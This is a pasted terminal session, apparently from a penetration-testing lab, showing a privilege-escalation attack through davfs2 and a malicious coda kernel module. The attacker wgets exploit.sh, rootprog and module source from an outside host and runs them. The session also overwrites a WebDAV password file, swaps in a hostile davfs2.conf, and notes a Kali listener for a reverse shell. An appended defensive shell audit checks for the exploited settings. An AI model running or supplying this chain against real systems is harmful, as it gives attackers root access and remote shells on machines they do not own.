- $ cd /tmp
- cd /tmp
- $ wget http://10.11.0.31/paul/exploit.sh | wget http://10.11.0.31/paul/rootprog | wget http://10.11.0.31/paul/coda.c | wget http://10.11.0.31/paul/Makefile
- wget http://10.11.0.31/paul/exploit.sh | wget http://10.11.0.31/paul/rootprog | wget http://10.11.0.31/paul/coda.c | wget http://10.11.0.31/paul/Makefile
- --2016-06-18 05:45:52-- http://10.11.0.31/paul/Makefile
- --2016-06-18 05:45:52-- http://10.11.0.31/paul/coda.c
- Connecting to 10.11.0.31:80... Connecting to 10.11.0.31:80... --2016-06-18 05:45:52-- http://10.11.0.31/paul/exploit.sh
- --2016-06-18 05:45:52-- http://10.11.0.31/paul/rootprog
- Connecting to 10.11.0.31:80... Connecting to 10.11.0.31:80... connected.
- HTTP request sent, awaiting response... connected.
- HTTP request sent, awaiting response... connected.
- HTTP request sent, awaiting response... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 158
- Saving to: `Makefile'
- 200 OK
- Length: 658 [text/x-csrc]
- Saving to: `coda.c'
- 200 OK
- Length: 3586 (3.5K) [text/x-sh]
- Saving to: `exploit.sh'
- 200 OK
- Length: 5132 (5.0K)
- Saving to: `rootprog'
- 100%[======================================>] 658 --.-K/s in 0s
- 2016-06-18 05:45:53 (60.6 MB/s) - `coda.c' saved [658/658]
- 100%[======================================>] 158 --.-K/s in 0s
- 2016-06-18 05:45:53 (26.3 MB/s) - `Makefile' saved [158/158]
- 100%[======================================>] 5,132 --.-K/s in 0s
- 2016-06-18 05:45:53 (456 MB/s) - `rootprog' saved [5132/5132]
- 100%[======================================>] 3,586 --.-K/s in 0s
- 2016-06-18 05:45:53 (297 MB/s) - `exploit.sh' saved [3586/3586]
- $ ls
- ls
- coda.c exploit.sh Makefile mongodb-27017.sock rootprog vmware-root
- $ chmod 777 *
- chmod 777 *
- chmod: changing permissions of `mongodb-27017.sock': Operation not permitted
- chmod: changing permissions of `vmware-root': Operation not permitted
- $ ./exploit.sh
- ./exploit.sh
- #######################################
- Specify the full path of the kernel module which you want to load
- Leave empty if you wish to compile it now
- Understand that you need kernel headers, make and gcc for successful compilation
- #######################################
- make -C /lib/modules/3.2.0-4-686-pae/build M=/tmp modules
- make[1]: Entering directory `/usr/src/linux-headers-3.2.0-4-686-pae'
- CC [M] /tmp/coda.o
- Building modules, stage 2.
- MODPOST 1 modules
- CC /tmp/coda.mod.o
- LD [M] /tmp/coda.ko
- make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-4-686-pae'
- #######################################
- Copying the modules in use for the running kernel in the local directory
- #######################################
- #######################################
- Copying coda.ko module
- #######################################
- #######################################
- Setting the 'modules.dep' and running depmod
- #######################################
- #######################################
- Specify the user-mode ELF which you whish to copy in /tmp/rootprog that will be run as root. Default value is /tmp/rootprog
- WARNING !!!!!!!! YOU HAVE ONLY 1 SHOT !!!!! unmounting webdav partitions doesn't unload the coda.ko module
- #######################################
- /tmp/rootprog
- /tmp/rootprog
- cp: `/tmp/rootprog' and `/tmp/rootprog' are the same file
- #######################################
- Setting MODPROBE_OPTIONS variable
- #######################################
- #######################################
- Now, check the the /home/davtest/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:
- # General Options
- # ---------------
- # dav_user davfs2 # system wide config file only
- # dav_group davfs2 # system wide config file only
- # ignore_home # system wide config file only
- kernel_fs coda
- # buf_size 16 # KiByte
- #######################################
- #######################################
- Then, check /etc/fstab for remote webdav servers which the user can mount, eg:
- https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0
- #######################################
- #######################################
- If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'
- #######################################
- davtest@humble:/tmp$ ls
- ls
- coda.c coda.mod.o lib modules.order rootprog
- coda.ko coda.o Makefile Module.symvers vmware-root
- coda.mod.c exploit.sh modules.dep.ok mongodb-27017.sock
- davtest@humble:/tmp$ cd /home/davtest/.davfs2
- cd /home/davtest/.davfs2
- davtest@humble:~/.davfs2$ wget http://10.11.0.31/paul/davfs2.conf
- wget http://10.11.0.31/paul/davfs2.conf
- --2016-06-18 05:55:22-- http://10.11.0.31/paul/davfs2.conf
- Connecting to 10.11.0.31:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2167 (2.1K)
- Saving to: `davfs2.conf.1'
- 100%[======================================>] 2,167 --.-K/s in 0s
- 2016-06-18 05:55:23 (6.74 MB/s) - `davfs2.conf.1' saved [2167/2167]
- davtest@humble:~/.davfs2$ mv davfs2.conf.1 davfs2.conf
- mv davfs2.conf.1 davfs2.conf
- davtest@humble:~/.davfs2$ cd /var/www/web1
- cd /var/www/web1
- davtest@humble:/var/www/web1$ ls -la
- ls -la
- total 16
- drwxr-xr-x 3 root root 4096 Dec 26 2013 .
- drwxr-xr-x 3 root root 4096 Dec 26 2013 ..
- -rw-r----- 1 davtest www-data 43 Dec 26 2013 passwd.dav
- drwxr-xr-x 2 www-data root 4096 Dec 26 2013 web
- davtest@humble:/var/www/web1$ htpasswd -c /var/www/web1/passwd.dav test
- htpasswd -c /var/www/web1/passwd.dav test
- New password: test
- Re-type new password: test
- Adding password for user test
- davtest@humble:/var/www/web1$ cat passwd.dav
- ls
- cat passwd.dav
- test:$apr1$wCk.6j4z$/g2zDYMVzlmRvXAW/jV1F0
- davtest@humble:/var/www/web1$ ls
- passwd.dav web
- davtest@humble:/var/www/web1$ ls
- ls
- passwd.dav web
- davtest@humble:/var/www/web1$ ls -la
- ls -la
- total 16
- drwxr-xr-x 3 root root 4096 Dec 26 2013 .
- drwxr-xr-x 3 root root 4096 Dec 26 2013 ..
- -rw-r----- 1 davtest www-data 43 Jun 18 06:01 passwd.dav
- drwxr-xr-x 2 www-data root 4096 Dec 26 2013 web
- davtest@humble:/var/www/web1$ cat passwd.dav
- cat passwd.dav
- test:$apr1$wCk.6j4z$/g2zDYMVzlmRvXAW/jV1F0
- davtest@humble:/var/www/web1$ cd /home/davtest/.davfs2
- cd /home/davtest/.davfs2
- davtest@humble:~/.davfs2$ cat davfs2.conf
- cat davfs2.conf
- # davfs2 configuration file 2009-04-12
- # version 9
- # ------------------------------------
- # Copyright (C) 2006, 2007, 2008, 2009 Werner Baumann
- # Copying and distribution of this file, with or without modification, are
- # permitted in any medium without royalty provided the copyright notice
- # and this notice are preserved.
- # Please read the davfs2.conf (5) man page for a description of the
- # configuration options and syntax rules.
- # Available options and default values
- # ====================================
- # General Options
- # ---------------
- # dav_user davfs2 # system wide config file only
- # dav_group davfs2 # system wide config file only
- # ignore_home # system wide config file only
- kernel_fs coda
- # buf_size 16 # KiByte
- # WebDAV Related Options
- # ----------------------
- # use_proxy 1 # system wide config file only
- # proxy # system wide config file only
- # servercert
- # clientcert
- # secrets ~/.davfs2/secrets # user config file only
- # ask_auth 1
- # use_locks 1
- # lock_owner <user-name>
- # lock_timeout 1800 # seconds
- # lock_refresh 60 # seconds
- # use_expect100 0
- # if_match_bug 0
- # drop_weak_etags 0
- # allow_cookie 0
- # precheck 1
- # ignore_dav_header 0
- # server_charset
- # connect_timeout 10 # seconds
- # read_timeout 30 # seconds
- # retry 30 # seconds
- # max_retry 300 # seconds
- # add_header
- # Cache Related Options
- # ---------------------
- # backup_dir lost+found
- # cache_dir /var/cache/davfs2 # system wide cache
- # ~/.davfs2/cache # per user cache
- # cache_size 50 # MiByte
- # table_size 1024
- # dir_refresh 60 # seconds
- # file_refresh 1 # second
- # delay_upload 10
- # gui_optimize 0
- # Debugging Options
- # -----------------
- # debug # possible values: config, kernel, cache, http, xml,
- # httpauth, locks, ssl, httpbody, secrets, most
- davtest@humble:~/.davfs2$ ls
- ls
- cache certs davfs2.conf secrets
- davtest@humble:~/.davfs2$ mount /home/davtest/dav
- mount /home/davtest/dav
- Please enter the username to authenticate with server
- http://127.0.0.1/webdav/ or hit enter for none.
- Username: test
- test
- Please enter the password to authenticate user test with server
- http://127.0.0.1/webdav/ or hit enter for none.
- Password: test
- libkmod: ERROR ../libkmod/libkmod.c:554 kmod_search_moddep: could not open moddep file '/tmp/lib/modules/3.2.0-4-686-pae/modules.dep.bin'
- davtest@humble:~/.davfs2$ locate modules.dep.bin
- Second Output
- /sbin/mount.davfs: no free coda device to mount
- /sbin/mount.davfs: trying fuse kernel file system
- /sbin/mount.davfs: fuse device opened successfully
- what I did
- 4) run ./exploit.sh
- 5) move passwd.dav to replace /var/www/web1/passwd.dav
- 6) move davfs2.conf to replace /home/davtest/.davfs2/davfs2.conf
- 7) don't forget to start your Kali listener to receive your shell
- 8) mount /home/davtest/dav
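
Added example, not part of the original paste: a shell audit for the two settings the script output above tells the user to check, an active kernel_fs coda line in a davfs2 configuration file and an /etc/fstab davfs entry that carries the user option. The function names and the root-prefix argument are assumptions for illustration; the prefix lets the audit run against a mounted disk image or a test fixture.

```shell
#!/bin/sh
# Added defensive example (not from the paste).
# Usage after sourcing: audit_davfs /        (live system)
#                       audit_davfs /mnt/img (mounted image; assumed path)

# Print davfs2 config files with an active (uncommented) "kernel_fs coda".
find_coda_configs() {
    root=${1%/}
    for conf in "$root"/etc/davfs2/davfs2.conf \
                "$root"/home/*/.davfs2/davfs2.conf; do
        [ -f "$conf" ] || continue
        # Drop comments first so "# kernel_fs coda" does not match.
        if sed 's/#.*//' "$conf" |
           grep -Eq '^[[:space:]]*kernel_fs[[:space:]]+coda[[:space:]]*$'; then
            printf '%s\n' "$conf"
        fi
    done
}

# Print fstab mount points of type davfs that unprivileged users may mount.
find_user_davfs_mounts() {
    root=${1%/}
    [ -f "$root/etc/fstab" ] || return 0
    awk '
        $1 ~ /^#/ || NF < 4 { next }
        $3 == "davfs" {
            n = split($4, opts, ",")
            for (i = 1; i <= n; i++)
                if (opts[i] == "user" || opts[i] == "users") { print $2; break }
        }' "$root/etc/fstab"
}

# Succeed (and print findings) only when both conditions are present.
audit_davfs() {
    confs=$(find_coda_configs "$1")
    mounts=$(find_user_davfs_mounts "$1")
    [ -n "$confs" ] && [ -n "$mounts" ] || return 1
    printf 'kernel_fs coda in: %s\n' "$confs"
    printf 'user-mountable davfs: %s\n' "$mounts"
}
```
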